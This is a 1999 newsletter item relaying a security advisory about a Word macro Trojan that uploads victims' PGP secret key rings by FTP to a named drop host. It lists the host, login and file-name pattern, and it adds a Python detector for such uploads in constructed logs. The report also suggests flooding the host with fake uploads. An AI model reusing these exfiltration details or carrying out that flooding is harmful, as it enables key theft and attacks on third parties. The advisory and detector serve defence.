                Date: 1999-02-02
                 
                 
Macro Trojan steals PGP keys
                
                 
-.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- 
                 
                
JavaScripts that can steal mail addresses have been around for a while; a Visual Basic Trojan that steals PGP keys and ships them off via ftp had not been seen before.
The Cypherpunks are calling on people to keep the culprits at Codebreakers.org busy by burying them under masses of invalid keys secured with a strong passphrase.
ftp address: see below
 
-.-. --.-  -.-. --.-  -.-. --.-  -.-. --.-  -.-. --.-  -.-. --.-   
Date sent: 	Tue, 2 Feb 1999 14:19:07 +0100  
 
 Bill Stewart  
I just got a look at a Word file (CALIG.DOC) that contains  
user IDs and passwords to pornographic sites.  In addition to  
these pointers, it has a Trojan Horse that finds the user's  
private PGP key ring and ftp's it to: 
 
	209.201.88.110 (codebreakers.org)
	user anonymous
	password itsme@
	directory incoming
	binary mode
	stored name: NewSecRingFile[0-9][0-9][0-9][0-9]
 
This Trojan does its job in visual basic and - except for the  
initial notice (if enabled) that macros are present - gives no  
indication of this function that it performs. I figure the best  
defense against this is to: 
 
1) Have thousands of users ftp phony files to that IP address  
and filename on a regular basis, thus making it impossible to  
get any real PGP keys - preferably send valid-looking PGP  
keys so they have to waste a lot of time cracking them. 
 
2) Cut off all service for ftp with 209.201.88.110  
(codebreakers.org) - either at the ISP, at your gateway, or at  
the borders to your country. 
 
3) Prosecute for possession of access devices - with  
international cooperation between authorities. 
 
4) Tell your people that this has been done so they will stop 
looking at pornography listing files (fat chance this will work). 
 
At any rate, I hope that you will take prudent precautions  
within your organization against this potential attack on the  
security of your private keys. 
 
Fred Cohen & Associates: http://all.net - fc@all.net - tel/fax:925-454-0171
Fred Cohen at Sandia National Laboratories at tel:925-294-2087 fax:925-294-1225
[Much-too-long disclaimer omitted, separating the two roles. PGN]
 
------------------------------ 
 
--- end forwarded text 
 
relayed 
Robert A. Hettinga 
http://www.philodox.com
                   
via Miki San  
http://www.gis.at
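Added example, not part of the forwarded report or the newsletter: a small detector that walks client-to-server FTP control-channel log lines and flags sessions matching the exfiltration pattern described above (drop host, anonymous login, STOR of NewSecRingFile followed by four digits). The log line format and the sample sessions are constructed for this example and are not any real product's output.

```python
import re

# Indicators from the forwarded report: drop host, anonymous login and the
# stored-file pattern NewSecRingFile[0-9][0-9][0-9][0-9].
DROP_HOST = "209.201.88.110"
SECRING_NAME = re.compile(r"^NewSecRingFile\d{4}$")

# Constructed log format (an assumption): "<time> <src> -> <dst> <FTP-COMMAND> [argument]"
LINE = re.compile(r"^\S+ (\S+) -> (\S+) ([A-Z]{3,4})(?: (.*))?$")

def parse_sessions(lines):
    """Group client-to-server FTP control commands by (src, dst) pair."""
    sessions = {}
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        src, dst, cmd, arg = m.groups()
        s = sessions.setdefault((src, dst), {"src": src, "dst": dst, "stored": []})
        if cmd == "USER":
            s["user"] = arg or ""
        elif cmd == "STOR":
            s["stored"].append((arg or "").rsplit("/", 1)[-1])  # basename only
    return list(sessions.values())

def flag_exfil(sessions):
    """Return (session, reasons) for sessions matching the reported pattern."""
    hits = []
    for s in sessions:
        reasons = []
        if s["dst"] == DROP_HOST:
            reasons.append("upload target is the reported drop host")
        if s.get("user") == "anonymous" and any(SECRING_NAME.match(n) for n in s["stored"]):
            reasons.append("anonymous STOR of NewSecRingFile#### (drop host may have moved)")
        if reasons:
            hits.append((s, reasons))
    return hits

# Constructed sample: one exfil session and one benign anonymous upload.
SAMPLE_LOG = """
1999-02-02T14:19:07 10.0.0.5 -> 209.201.88.110 USER anonymous
1999-02-02T14:19:07 10.0.0.5 -> 209.201.88.110 PASS itsme@
1999-02-02T14:19:09 10.0.0.5 -> 209.201.88.110 STOR NewSecRingFile4711
1999-02-02T15:00:01 10.0.0.9 -> 192.0.2.20 USER anonymous
1999-02-02T15:00:02 10.0.0.9 -> 192.0.2.20 STOR report.txt
""".strip().splitlines()

if __name__ == "__main__":
    for s, why in flag_exfil(parse_sessions(SAMPLE_LOG)):
        print(f"{s['src']} -> {s['dst']}: {'; '.join(why)}")
```

The second rule deliberately ignores the destination address, since a drop site can be moved while the macro's stored-file naming stays the same.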
                   
-.-. --.-  -.-. --.-  -.-. --.-  -.-. --.-  -.-. --.-  -.-. --.-
    
                 
- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- 
                
edited by Harkank 
published on: 1999-02-02 
comments to office@quintessenz.at
- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- 